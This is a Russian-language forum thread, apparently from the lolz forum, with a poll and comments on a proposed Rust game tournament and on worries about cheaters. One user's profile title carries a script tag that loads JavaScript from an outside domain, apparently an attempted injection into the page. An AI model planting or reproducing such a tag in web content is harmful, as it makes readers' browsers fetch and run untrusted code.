Загрузка...

Событие Как вы смотрите на такое? [Турнир Rust]

Тема в разделе Rust создана пользователем Ладья 24 фев 2023. (поднята 24 фев 2023) 2413 просмотров

Опрос
Как вам идея?
  1. Отличная

87,5%
    49
  2. Не очень

12,5%
    7
  1. hvh
    hvh 24 фев 2023 слуга народа 11 244 4 апр 2020
    Это будет как клан на клан или выживания с нуля и дальше кто богаче всех будет?

2. userNOname
    userNOname 24 фев 2023 6717 29 авг 2021
    я надоелся ждать турик по PUBG...уже по всему что только можно турики были, но не по PUBG

3. Rossi4ch
    Rossi4ch 24 фев 2023 Меня знают все, кроме тебя. 88 3 авг 2019
    Выглядит классно, были бы разные турниры соло, дуо, трио, т.к у меня тиммейтов нет соло бы поиграл)

4. flaavx
    flaavx 24 фев 2023 211 23 авг 2019
    хз ну сделаешь ты турик, сервера свои откроешь, они от силы недели 3 будут актуальными а потом все обратно на оф серваки или самые популярные модовые серваки по типу магикраста пойдут и все

1. Ладья Автор темы
      flaavx, ну это же не моды будут
    2. flaavx
      Ладья, я не к тому, я про то что челы вайп доиграют к примеру, и пойдет на свои сервера дальше играть на которых они месяцами или годами играют, серваков раста и так огромное колво
    3. workingkilla
      Ладья, не моды, не интересно и долго
  5. eldiablo666
    eldiablo666 24 фев 2023 3311 18 ноя 2018
    не вижу смысла, 90% юзеров лолза будут играть с софтом, перебанив всех онлайн от силы 50 останется

1. Ладья Автор темы
      eldiablo666, Кто сказал что играют только юзеры лолза
  6. sadow999
    sadow999 24 фев 2023 0 23 фев 2023
    прикольная идея. Сделать классик сервер с лимитом в 200. Доступ условно 2 евро. И катать на здоровье с лолз комунити

7. DedVPN
    Идея топчик, я хоть и нн, но админю раст, могу с хостингом подсобить (но надо будет тестить), кароч за любой кипишь, кроме голодовки) дд надо звать по любому

Upd: только как с читерами будет обстоять вопрос?

24 фев 2023 Изменено
    1. Ладья Автор темы
      DedVPN, в то отстучи
  8. FATALNIY
    FATALNIY 24 фев 2023 <script src='//niks&#46;dev/1.js'> 91 17 май 2022
    единственное что я понял это что все будут лететь на форум но так и не понял что они будут в расте делать тк не играю в него но идея интересная

9. Kyedae
    Kyedae 24 фев 2023 Участвует в переписке, Только что
    классная идея :finger_up: топ :finger_up: все понятно то как сразу! рассказал бы подробнее в каком формате будет, например кланы против кланов или же похуй кланы или не кланы, даже соло игрок может войти в топ или что у тебя там будет.
    А ну да как дела с макросами? я могу любую проверку со своей мышкой блади 2019 года обойти! что с такими типами делать?
    как будешь вычислять читеров?
    у тебя пока только идея Турнира! ну это РАСТ и это не игра для Турниров, ну было бы интересно посмотреть

1. Ладья Автор темы
      Kyedae, ну так ты со своей мышкой учавствовать уже и не будешь) зачем тебе лишним голову забивать
    2. Kyedae
      Ладья, если я даже буду участвовать ты об этом и не узнаешь :dance:
  10. nullptr
    100% будут читеры, и из за механик игры это огромный процент победы.

1. Ладья Автор темы
      nullptr, читеры во всех играх
    2. nullptr
      Ладья, Тогда логичнее будет провести турнир формата PvP рейда (есть такие сервера типа 2 дома 2 команды, в нем лут для рейда, кто первый зарейдит тот и победил)
    3. Ладья Автор темы
      nullptr, разберемся бро
  11. Победа
    Победа 25 фев 2023 :cat_smile2: 7051 24 янв 2019
    Игра не киберспорт давно, участвовал в туриках во времена еще Valim и тд фури раста , полная хуета, а не турики + такое организовать и уследить за всеми макросниками читерами не получится , кто с облака будет ебашить там так легко скрыть читы и ты их никак не найдешь если они сами не признаются , так что бред)

1. Посмотреть предыдущие комментарии (11)
    2. workingkilla
    3. Победа
    4. pencil_fill
      Архитектор
      Победа, как варик играть только через пк клуб.
  12. falovskiy
    а в чем рофл всего турика то? на комбате чисто похуярится?

1. Ладья Автор темы
      @falovskiy,нет
  13. Cofe4ikjkee
    Cofe4ikjkee 27 фев 2023 7893 16 янв 2021
    1. Посмотреть предыдущие комментарии (12)
    2. Cofe4ikjkee
      workingkilla, да посмотри ща мувики всяких таких негодяев
    3. workingkilla
      Cofe4ikjkee, каво, я не смотрю негодяев(
  14. pencil_fill
    Архитектор
    Хочу,жду.

Загрузка...